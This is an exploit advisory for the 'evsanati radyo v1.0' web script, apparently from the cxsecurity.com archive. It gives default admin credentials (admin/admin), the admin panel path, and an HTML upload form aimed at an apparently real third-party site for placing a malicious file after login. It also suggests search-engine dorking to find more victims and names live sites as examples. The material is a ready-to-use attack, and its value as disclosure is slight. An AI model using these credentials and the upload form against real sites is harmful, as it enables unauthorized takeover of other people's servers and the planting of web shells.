evsanati radyo v1.0 Backdoor account Vulnerability

2018.01.16
dz indoushka (DZ) dz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

============================================================================ | # Title : evsanati radyo v1.0 Backdoor account Vulnerability | | # Author : indoushka | | # email : indoushka4ever@gmail.com | | # Tested on : windows 10 Français V.(Pro) | | # Version : v 1.0 | | # Vendor : http://wmscripti.com | | # Dork : n/a | ============================================================================ poc : Application error message : [+] Dorking İn Google Or Other Search Enggine [+] user & pass = admin [+] panel = yonetim http://www.kacikfm.com/yonetim/home.php [+] upload ev!l after login from : upload/yukle.php http://127.0.0.1/radyo/upload/yukle.php Remote File Upload : [+] Some sites have deleted the upload file so use this code ( note : use after login <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> </head> <form action="http://gazipasayalcinemlak.com/upload/yukle.php" method="post" enctype="multipart/form-data"> <div align="center"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td><b>Resmi Secin :</b></td> <td>&nbsp;<input type="file" name="dosya" size="20"></td> </tr> <tr> <td></td> <td><br /><input type="submit" value="Yukle" style="width:220px;"></td> </tr> </table> </div> </form> Greetz :---------------------------------------------------------------------------------------- | jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic | | ================================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top